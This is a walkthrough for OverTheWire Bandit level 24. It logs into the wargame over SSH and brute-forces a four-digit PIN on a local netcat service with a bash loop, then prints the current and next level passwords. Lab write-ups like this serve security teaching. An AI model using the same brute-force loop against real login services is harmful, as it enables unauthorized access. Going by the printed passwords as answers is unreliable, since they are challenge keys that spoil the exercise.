Bandit Level 24 Solution

Bandit level 24 will teach you about brute forcing concept by trying to break 4-PIN password

Let’s start by logging into the machine

ssh bandit24@bandit.labs.overthewire.org -p 2220  

and the password we got from the previous level

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

So, we know that there is a network service running on port 30002 , so let’s see how it works.

first let’s connect to that port using netcat

nc localhost 30002

Then it will ask for the current level password

now we have to give the password along with 4 pin code in this format

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 1234

and then we need to get the right one.

let’s start by writing a bash script that will go through all combinations that starts from 0000 till 9999 and we won’t show the “Wrong! Please enter the correct pincode. Try again.” message

so let’s go to tmp directory first and create our script

cd /tmp

mkdir testme && cd testme

nano scrip_brute.sh

and let’s paste the following code

 #!/bin/bash 

for i in {0000..9999}
do 
        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ  $i" 
done | nc localhost 30002  | grep -v Wrong 

Now let’s analyze the code

• we’re going through all combinations from 0000 to 9999
• then we’re printing the combination along with the pin generated
• after that we’re passing the combinations to netcat
• then we’re using grep to exclude (-v is for inverted search) the wrong password

after you’re done, you need to change the permission to allow executing the file

run the file and you should get the password for the next level

uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG